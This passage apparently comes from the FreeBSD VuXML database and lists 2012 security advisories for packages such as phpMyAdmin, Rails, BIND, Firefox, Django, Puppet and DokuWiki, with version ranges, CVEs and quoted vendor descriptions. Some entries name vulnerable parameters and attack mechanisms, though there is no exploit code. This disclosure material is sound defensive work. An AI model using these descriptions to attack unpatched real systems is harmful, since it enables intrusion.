<vuln vid="aca0d7e0-e38a-11e1-999b-e0cb4e266481">
<topic>phpMyAdmin -- Path disclosure due to missing library</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><lt>3.5.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-3.php">
<p>The show_config_errors.php script does not include a
library, so an error message shows the full path of this
file, leading to possible further attacks.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4219</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-3.php</url>
</references>
<dates>
<discovery>2012-08-03</discovery>
<entry>2012-08-11</entry>
</dates>
</vuln>
<vuln vid="31db9a18-e289-11e1-a57d-080027a27dbf">
<topic>rubygem-rails -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-rails</name>
<range><lt>3.2.8</lt></range>
</package>
<package>
<name>rubygem-actionpack</name>
<range><lt>3.2.8</lt></range>
</package>
<package>
<name>rubygem-activesupport</name>
<range><lt>3.2.8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Rails core team reports:</p>
<blockquote cite="http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/">
<p>This version contains three important security fixes, please upgrade immediately.</p>
<p>One of security fixes impacts all users and is related to HTML escaping code. The
other two fixes impacts people using select_tag's prompt option and strip_tags
helper from ActionPack.</p>
<p>CVE-2012-3463 Potential XSS Vulnerability in select_tag prompt.</p>
<p>CVE-2012-3464 Potential XSS Vulnerability in the HTML escaping code.</p>
<p>CVE-2012-3465 XSS Vulnerability in strip_tags.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3463</cvename>
<cvename>CVE-2012-3464</cvename>
<cvename>CVE-2012-3465</cvename>
<url>https://groups.google.com/d/msg/rubyonrails-security/fV3QUToSMSw/eHBSFOUYHpYJ</url>
<url>https://groups.google.com/d/msg/rubyonrails-security/kKGNeMrnmiY/r2yM7xy-G48J</url>
<url>https://groups.google.com/d/msg/rubyonrails-security/FgVEtBajcTY/tYLS1JJTu38J</url>
<url>http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/</url>
</references>
<dates>
<discovery>2012-08-08</discovery>
<entry>2012-08-10</entry>
</dates>
</vuln>
<vuln vid="8675efd5-e22c-11e1-a808-002354ed89bc">
<topic>sudosh -- buffer overflow</topic>
<affects>
<package>
<name>sudosh2</name>
<range><le>1.0.2</le></range>
</package>
<package>
<name>sudosh3</name>
<range><le>3.2.0_2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISS reports:</p>
<blockquote cite="http://xforce.iss.net/xforce/xfdb/55903">
<p>sudosh2 and sudosh3 are vulnerable to a stack-based buffer
overflow, caused by improper bounds checking by the replay()
function. By persuading a victim to replay a specially-crafted
recorded sudo session, a local attacker could overflow a buffer
and execute arbitrary code on the system with elevated privileges
or cause the application to crash.</p>
</blockquote>
</body>
</description>
<references>
<url>http://xforce.iss.net/xforce/xfdb/55903</url>
<url>http://secunia.com/advisories/38349</url>
<url>http://secunia.com/advisories/38292</url>
</references>
<dates>
<discovery>2010-01-17</discovery>
<entry>2012-08-09</entry>
</dates>
</vuln>
<vuln vid="0f020b7b-e033-11e1-90a2-000c299b62e1">
<topic>FreeBSD -- named(8) DNSSEC validation Denial of Service</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_10</lt></range>
<range><ge>8.1</ge><lt>8.1_13</lt></range>
<range><ge>8.2</ge><lt>8.2_10</lt></range>
<range><ge>8.3</ge><lt>8.3_4</lt></range>
<range><ge>9.0</ge><lt>9.0_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:05.bind.asc">
<p>BIND 9 stores a cache of query names that are known to be failing
due to misconfigured name servers or a broken chain of trust.
Under high query loads, when DNSSEC validation is active, it is
possible for a condition to arise in which data from this cache of
failing queries could be used before it was fully initialized,
triggering an assertion failure.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:05.bind</freebsdsa>
<cvename>CVE-2012-3817</cvename>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-07</entry>
</dates>
</vuln>
<vuln vid="36235c38-e0a8-11e1-9f4d-002354ed89bc">
<topic>automake -- Insecure 'distcheck' recipe granted world-writable distdir</topic>
<affects>
<package>
<name>automake</name>
<range><ge>1.5.0</ge><lt>1.12.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>GNU reports:</p>
<blockquote cite="https://lists.gnu.org/archive/html/automake/2012-07/msg00023.html">
<p>The recipe of the 'distcheck' target granted temporary
world-write permissions on the extracted distdir. This introduced
a locally exploitable race condition for those who run "make
distcheck" with a non-restrictive umask (e.g., 022) in a directory
that was accessible by others. A successful exploit would result
in arbitrary code execution with the privileges of the user
running "make distcheck".</p>
<p>It is important to stress that this vulnerability impacts not only
the Automake package itself, but all packages with
Automake-generated makefiles. For an effective fix it is necessary
to regenerate the Makefile.in files with a fixed Automake
version.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3386</cvename>
<url>https://lists.gnu.org/archive/html/automake/2012-07/msg00023.html</url>
</references>
<dates>
<discovery>2012-07-09</discovery>
<entry>2012-08-06</entry>
<modified>2012-08-25</modified>
</dates>
</vuln>
<vuln vid="dbf338d0-dce5-11e1-b655-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>14.0.1,1</lt></range>
<range><lt>10.0.6,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.6,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.11</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.6</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.11</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>14.0</lt></range>
<range><lt>10.0.6</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-42 Miscellaneous memory safety hazards (rv:14.0/
rv:10.0.6)</p>
<p>MFSA 2012-43 Incorrect URL displayed in addressbar through drag and
drop</p>
<p>MFSA 2012-44 Gecko memory corruption</p>
<p>MFSA 2012-45 Spoofing issue with location</p>
<p>MFSA 2012-46 XSS through data: URLs</p>
<p>MFSA 2012-47 Improper filtering of javascript in HTML feed-view</p>
<p>MFSA 2012-48 use-after-free in nsGlobalWindow::PageHidden</p>
<p>MFSA 2012-49 Same-compartment Security Wrappers can be bypassed</p>
<p>MFSA 2012-50 Out of bounds read in QCMS</p>
<p>MFSA 2012-51 X-Frame-Options header ignored when duplicated</p>
<p>MFSA 2012-52 JSDependentString::undepend string conversion results
in memory corruption</p>
<p>MFSA 2012-53 Content Security Policy 1.0 implementation errors
cause data leakage</p>
<p>MFSA 2012-54 Clickjacking of certificate warning page</p>
<p>MFSA 2012-55 feed: URLs with an innerURI inherit security context
of page</p>
<p>MFSA 2012-56 Code execution through javascript: URLs</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1949</cvename>
<cvename>CVE-2012-1950</cvename>
<cvename>CVE-2012-1951</cvename>
<cvename>CVE-2012-1952</cvename>
<cvename>CVE-2012-1953</cvename>
<cvename>CVE-2012-1954</cvename>
<cvename>CVE-2012-1955</cvename>
<cvename>CVE-2012-1957</cvename>
<cvename>CVE-2012-1958</cvename>
<cvename>CVE-2012-1959</cvename>
<cvename>CVE-2012-1960</cvename>
<cvename>CVE-2012-1961</cvename>
<cvename>CVE-2012-1962</cvename>
<cvename>CVE-2012-1963</cvename>
<cvename>CVE-2012-1964</cvename>
<cvename>CVE-2012-1965</cvename>
<cvename>CVE-2012-1966</cvename>
<cvename>CVE-2012-1967</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-42.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-43.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-44.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-45.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-46.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-47.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-48.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-49.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-50.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-51.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-52.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-53.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-54.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-55.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-56.html</url>
</references>
<dates>
<discovery>2012-07-17</discovery>
<entry>2012-08-02</entry>
</dates>
</vuln>
<vuln vid="de2bc01f-dc44-11e1-9f4d-002354ed89bc">
<topic>Apache -- Insecure LD_LIBRARY_PATH handling</topic>
<affects>
<package>
<name>apache</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-event</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-itk</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-peruser</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-worker</name>
<range><le>2.2.22_5</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Apache reports:</p>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_24.html">
<p>Insecure handling of LD_LIBRARY_PATH was found that could lead to
the current working directory to be searched for DSOs. This could
allow a local user to execute code as root if an administrator runs
apachectl from an untrusted directory.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0883</cvename>
<url>http://httpd.apache.org/security/vulnerabilities_24.html</url>
<url>http://www.apache.org/dist/httpd/CHANGES_2.4.2</url>
</references>
<dates>
<discovery>2012-03-02</discovery>
<entry>2012-08-01</entry>
</dates>
</vuln>
<vuln vid="f01292a0-db3c-11e1-a84b-00e0814cab4e">
<topic>django -- multiple vulnerabilities</topic>
<affects>
<package>
<name>py26-django</name>
<range><ge>1.4</ge><lt>1.4.1</lt></range>
<range><ge>1.3</ge><lt>1.3.2</lt></range>
</package>
<package>
<name>py27-django</name>
<range><ge>1.4</ge><lt>1.4.1</lt></range>
<range><ge>1.3</ge><lt>1.3.2</lt></range>
</package>
<package>
<name>py26-django-devel</name>
<range><lt>20120731,1</lt></range>
</package>
<package>
<name>py27-django-devel</name>
<range><lt>20120731,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Django project reports:</p>
<blockquote cite="https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/">
<p>Today the Django team is issuing multiple releases --
Django 1.3.2 and Django 1.4.1 -- to remedy security issues
reported to us:</p>
<ul>
<li>Cross-site scripting in authentication views</li>
<li>Denial-of-service in image validation</li>
<li>Denial-of-service via get_image_dimensions()</li>
</ul>
<p>All users are encouraged to upgrade Django immediately.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3442</cvename>
<cvename>CVE-2012-3443</cvename>
<cvename>CVE-2012-3444</cvename>
<url>https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/</url>
</references>
<dates>
<discovery>2012-07-30</discovery>
<entry>2012-07-31</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="58253655-d82c-11e1-907c-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.10</lt></range>
<range><ge>4.0.0</ge><lt>4.0.7</lt></range>
<range><ge>4.2.0</ge><lt>4.2.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>A Bugzilla Security Advisory reports:</h1>
<blockquote cite="http://www.bugzilla.org/security/3.6.9/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Information Leak</h1>
<p>Versions: 4.1.1 to 4.2.1, 4.3.1</p>
<p>In HTML bugmails, all bug IDs and attachment IDs are
linkified, and hovering these links displays a tooltip
with the bug summary or the attachment description if
the user is allowed to see the bug or attachment.
But when validating user permissions when generating the
email, the permissions of the user who edited the bug were
taken into account instead of the permissions of the
addressee. This means that confidential information could
be disclosed to the addressee if the other user has more
privileges than the addressee.
Plain text bugmails are not affected as bug and attachment
IDs are not linkified.</p>
<h1>Information Leak</h1>
<p>Versions: 2.17.5 to 3.6.9, 3.7.1 to 4.0.6, 4.1.1 to
4.2.1, 4.3.1</p>
<p>The description of a private attachment could be visible
to a user who hasn't permissions to access this attachment
if the attachment ID is mentioned in a public comment in
a bug that the user can see.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1968</cvename>
<cvename>CVE-2012-1969</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=777398</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=777586</url>
</references>
<dates>
<discovery>2012-07-26</discovery>
<entry>2012-07-27</entry>
</dates>
</vuln>
<vuln vid="17f369dc-d7e7-11e1-90a2-000c299b62e1">
<topic>nsd -- Denial of Service</topic>
<affects>
<package>
<name>nsd</name>
<range><lt>3.2.13</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Tom Hendrikx reports:</p>
<blockquote cite="http://www.nlnetlabs.nl/downloads/CVE-2012-2979.txt">
<p>It is possible to crash (SIGSEGV) a NSD child server process by
sending it a DNS packet from any host on the internet and the per
zone stats build option is enabled. A crashed child process will
automatically be restarted by the parent process, but an attacker
may keep the NSD server occupied restarting child processes by
sending it a stream of such packets effectively preventing the
NSD server to serve.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2979</cvename>
<url>http://www.nlnetlabs.nl/downloads/CVE-2012-2979.txt</url>
</references>
<dates>
<discovery>2012-07-27</discovery>
<entry>2012-07-27</entry>
</dates>
</vuln>
<vuln vid="ae2fa87c-4bca-4138-8be1-67ce2a19b3a8">
<topic>rubygem-actionpack -- Denial of Service</topic>
<affects>
<package>
<name>rubygem-actionpack</name>
<range><lt>3.2.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/vxJjrc15qYM">
<p>There is a DoS vulnerability in Action Pack digest authentication
handling in authenticate_or_request_with_http_digest.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3424</cvename>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/vxJjrc15qYM</url>
</references>
<dates>
<discovery>2012-07-26</discovery>
<entry>2012-07-26</entry>
</dates>
</vuln>
<vuln vid="cdc4ff0e-d736-11e1-8221-e0cb4e266481">
<topic>p5-RT-Authen-ExternalAuth -- privilege escalation</topic>
<affects>
<package>
<name>p5-RT-Authen-ExternalAuth</name>
<range><lt>0.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The RT development team reports:</p>
<blockquote cite="http://blog.bestpractical.com/2012/07/security-vulnerabilities-in-three-commonly-deployed-rt-extensions.html">
<p>RT::Authen::ExternalAuth 0.10 and below (for all versions
of RT) are vulnerable to an escalation of privilege attack
where the URL of a RSS feed of the user can be used to
acquire a fully logged-in session as that user.
CVE-2012-2770 has been assigned to this vulnerability.</p>
<p>Users of RT 3.8.2 and above should upgrade to
RT::Authen::ExternalAuth 0.11, which resolves this
vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<url>http://blog.bestpractical.com/2012/07/security-vulnerabilities-in-three-commonly-deployed-rt-extensions.html</url>
<cvename>CVE-2012-2770</cvename>
</references>
<dates>
<discovery>2012-07-25</discovery>
<entry>2012-07-26</entry>
</dates>
</vuln>
<vuln vid="c7fa3618-d5ff-11e1-90a2-000c299b62e1">
<topic>isc-dhcp -- multiple vulnerabilities</topic>
<affects>
<package>
<name>isc-dhcp41-server</name>
<range><lt>4.1.e_5,2</lt></range>
</package>
<package>
<name>isc-dhcp42-server</name>
<range><lt>4.2.4_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://www.isc.org/announcement/bind-and-dhcp-security-updates-released">
<p>An unexpected client identifier parameter can cause the ISC DHCP
daemon to segmentation fault when running in DHCPv6 mode,
resulting in a denial of service to further client requests. In
order to exploit this condition, an attacker must be able to send
requests to the DHCP server.</p>
<p>An error in the handling of malformed client identifiers can cause
a DHCP server running affected versions (see "Impact") to enter a
state where further client requests are not processed and the
server process loops endlessly, consuming all available CPU
cycles.
Under normal circumstances this condition should not be
triggered, but a non-conforming or malicious client could
deliberately trigger it in a vulnerable server. In order to
exploit this condition an attacker must be able to send requests
to the DHCP server.</p>
<p>Two memory leaks have been found and fixed in ISC DHCP. Both are
reproducible when running in DHCPv6 mode (with the -6 command-line
argument.) The first leak is confirmed to only affect servers
operating in DHCPv6 mode, but based on initial code analysis the
second may theoretically affect DHCPv4 servers (though this has
not been demonstrated.)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3570</cvename>
<cvename>CVE-2012-3571</cvename>
<cvename>CVE-2012-3954</cvename>
<url>https://kb.isc.org/article/AA-00714</url>
<url>https://kb.isc.org/article/AA-00712</url>
<url>https://kb.isc.org/article/AA-00737</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-07-25</entry>
</dates>
</vuln>
<vuln vid="0bc67930-d5c3-11e1-bef6-0024e81297ae">
<topic>dns/bind9* -- Heavy DNSSEC Validation Load Can Cause a 'Bad Cache' Assertion Failure</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.2</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.2</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.2</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00729">
<p>High numbers of queries with DNSSEC validation enabled can
cause an assertion failure in named, caused by using a 'bad cache'
data structure before it has been initialized.</p>
<p>BIND 9 stores a cache of query names that are known to be failing due
to misconfigured name servers or a broken chain of trust. Under high query
loads when DNSSEC validation is active, it is possible for a condition
to arise in which data from this cache of failing queries could be used
before it was fully initialized, triggering an assertion failure.</p>
<p>This bug cannot be encountered unless your server is doing DNSSEC
validation.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3817</cvename>
<url>https://kb.isc.org/article/AA-00729</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-07-24</entry>
</dates>
</vuln>
<vuln vid="748aa89f-d529-11e1-82ab-001fd0af1a4c">
<topic>rubygem-activerecord -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-activemodel</name>
<range><lt>3.2.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>rubygem-activerecord -- multiple vulernabilities</p>
<blockquote>
<p>Due to the way Active Record interprets parameters in
combination with the way that Rack parses query parameters, it
is possible for an attacker to issue unexpected database
queries with "IS NULL" where clauses. This issue does *not*
let an attacker insert arbitrary values into an SQL query,
however they can cause the query to check for NULL where most
users wouldn't expect it.</p>
<p>Due to the way Active Record handles nested query parameters,
an attacker can use a specially crafted request to inject some
forms of SQL into your application's SQL queries.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2660</cvename>
<cvename>CVE-2012-2661</cvename>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/8SA-M3as7A8</url>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/dUaiOOGWL1k</url>
</references>
<dates>
<discovery>2012-05-31</discovery>
<entry>2012-07-23</entry>
<modified>2012-07-23</modified>
</dates>
</vuln>
<vuln vid="bdab0acd-d4cd-11e1-8a1c-14dae9ebcf89">
<topic>php -- potential overflow in _php_stream_scandir</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.5</lt></range>
<range><ge>5.3</ge><lt>5.3.15</lt></range>
<range><ge>5.2</ge><lt>5.2.17_10</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.15</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PHP Development Team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-07-19-1">
<p>The release of PHP 5.4.15 and 5.4.5 fix a potential overflow in
_php_stream_scandir</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2688</cvename>
<url>http://www.php.net/archive/2012.php#id2012-07-19-1</url>
</references>
<dates>
<discovery>2012-07-19</discovery>
<entry>2012-07-23</entry>
<modified>2013-01-15</modified>
</dates>
</vuln>
<vuln vid="ce82bfeb-d276-11e1-92c6-14dae938ec40">
<topic>dns/nsd -- DoS vulnerability from non-standard DNS packet</topic>
<affects>
<package>
<name>nsd</name>
<range><lt>3.2.11_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Marek Vavrusa and Lubos Slovak report:</p>
<blockquote cite="http://www.nlnetlabs.nl/downloads/CVE-2012-2978.txt">
<p>It is possible to crash (SIGSEGV) a NSD child server process
by sending it a non-standard DNS packet from any host on the
internet. A crashed child process will automatically be restarted
by the parent process, but an attacker may keep the NSD server
occupied restarting child processes by sending it a stream of
such packets effectively preventing the NSD server to serve.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2978</cvename>
<freebsdpr>ports/170024</freebsdpr>
<url>http://www.nlnetlabs.nl/downloads/CVE-2012-2978.txt</url>
</references>
<dates>
<discovery>2012-07-19</discovery>
<entry>2012-07-20</entry>
<modified>2012-07-21</modified>
</dates>
</vuln>
<vuln vid="a460035e-d111-11e1-aff7-001fd056c417">
<topic>libjpeg-turbo -- heap-based buffer overflow</topic>
<affects>
<package>
<name>libjpeg-turbo</name>
<range><lt>1.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://sourceforge.net/projects/libjpeg-turbo/files/1.2.1/README.txt">
<p>The Changelog for version 1.2.1 says: Fixed a regression caused by
1.2.0[6] in which decompressing corrupt JPEG images (specifically,
images in which the component count was erroneously set to a large
value) would cause libjpeg-turbo to segfault.</p>
</blockquote>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=826849">
<p>A Heap-based buffer overflow was found in the way libjpeg-turbo
decompressed certain corrupt JPEG images in which the component count
was erroneously set to a large value. An attacker could create a
specially-crafted JPEG image that, when opened, could cause an
application using libpng to crash or, possibly, execute arbitrary code
with the privileges of the user running the application.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2806</cvename>
<url>http://sourceforge.net/projects/libjpeg-turbo/files/1.2.1/README.txt</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=826849</url>
</references>
<dates>
<discovery>2012-05-31</discovery>
<entry>2012-07-18</entry>
<modified>2012-07-19</modified>
</dates>
</vuln>
<vuln vid="2fe4b57f-d110-11e1-ac76-10bf48230856">
<topic>Dokuwiki -- cross site scripting vulnerability</topic>
<affects>
<package>
<name>dokuwiki</name>
<range><lt>20120125_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia Research reports:</p>
<blockquote cite="http://secunia.com/advisories/49196/">
<p>Secunia Research has discovered a vulnerability in DokuWiki, which can
be exploited by malicious people to conduct cross-site scripting
attacks.</p>
<p>Input passed to the "ns" POST parameter in lib/exe/ajax.php (when "call"
is set to "medialist" and "do" is set to "media") is not properly
sanitised within the "tpl_mediaFileList()" function in inc/template.php
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/49196/</url>
<cvename>CVE-2012-0283</cvename>
</references>
<dates>
<discovery>2012-07-13</discovery>
<entry>2012-07-18</entry>
</dates>
</vuln>
<vuln vid="3a6960ef-c8a8-11e1-9924-001fd0af1a4c">
<topic>puppet -- multiple vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.7.*</gt><lt>2.7.18</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>puppet -- multiple vulnerabilities</p>
<blockquote cite="http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.7.18">
<p>Arbitrary file read on the puppet master from authenticated
clients (high). It is possible to construct an HTTP get request
from an authenticated client with a valid certificate that will
return the contents of an arbitrary file on the Puppet master
that the master has read-access to.</p>
<p>Arbitrary file delete/D.O.S on Puppet Master from authenticated
clients (high). Given a Puppet master with the "Delete"
directive allowed in auth.conf for an authenticated host, an
attacker on that host can send a specially crafted Delete
request that can cause an arbitrary file deletion on the Puppet
master, potentially causing a denial of service attack. Note
that this vulnerability does *not* exist in Puppet as
configured by default.</p>
<p>The last_run_report.yaml is world readable (medium). The most
recent Puppet run report is stored on the Puppet master with
world-readable permissions. The report file contains the
context diffs of any changes to configuration on an agent,
which may contain sensitive information that an attacker can
then access. The last run report is overwritten with every
Puppet run.</p>
<p>Arbitrary file read on the Puppet master by an agent (medium).
This vulnerability is dependent upon vulnerability
"last_run_report.yml is world readable" above. By creating a
hard link of a Puppet-managed file to an arbitrary file that
the Puppet master can read, an attacker forces the contents to
be written to the puppet run summary. The context diff is
stored in last_run_report.yaml, which can then be accessed by
the attacker.</p>
<p>Insufficient input validation for agent hostnames (low). An
attacker could trick the administrator into signing an
attacker's certificate rather than the intended one by
constructing specially crafted certificate requests containing
specific ANSI control sequences. It is possible to use the
sequences to rewrite the order of text displayed to an
administrator such that display of an invalid certificate and
valid certificate are transposed. If the administrator signs
the attacker's certificate, the attacker can then
man-in-the-middle the agent.</p>
<p>Agents with certnames of IP addresses can be impersonated
(low). If an authenticated host with a certname of an IP
address changes IP addresses, and a second host assumes the
first host's former IP address, the second host will be treated
by the puppet master as the first one, giving the second host
access to the first host's catalog. Note: This will not be
fixed in Puppet versions prior to the forthcoming 3.x. Instead,
with this announcement IP-based authentication in Puppet &lt; 3.x
is deprecated.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3864</cvename>
<cvename>CVE-2012-3865</cvename>
<cvename>CVE-2012-3866</cvename>
<cvename>CVE-2012-3867</cvename>
<url>http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.7.18</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3864/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3865/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3866/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3867/</url>
</references>
<dates>
<discovery>2012-07-05</discovery>
<entry>2012-07-10</entry>
</dates>
</vuln>
<vuln vid="4c1ac2dd-c788-11e1-be25-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk</name>
<range><gt>10.*</gt><lt>10.5.2</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.13.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Possible resource leak on uncompleted re-invite transactions.</p>
<p>Remote crash vulnerability in voice mail application.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3812</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-010.html</url>
<url>http://downloads.digium.com/pub/security/AST-2012-011.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-07-05</discovery>
<entry>2012-07-06</entry>
<modified>2012-08-30</modified>
</dates>
</vuln>
<vuln vid="c28ee9cd-916e-4dcf-8ed3-e97e5846db6c">
<topic>typo3 -- Cross-Site Scripting Vulnerability in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5</ge><lt>4.5.17</lt></range>
<range><ge>4.6</ge><lt>4.6.10</lt></range>
<range><ge>4.7</ge><lt>4.7.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo3 Security Report (TYPO3-CORE-SA-2012-003):</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-003/">
<p>TYPO3 bundles and uses an external JavaScript and Flash Upload Library
called swfupload. TYPO3 can be configured to use this Flash uploader.
Input passed via the "movieName" parameter to swfupload.swf is not
properly sanitised before being used in a call to
"ExternalInterface.call()". This can be exploited to execute arbitrary
script code in a user's browser session in context of an affected site.
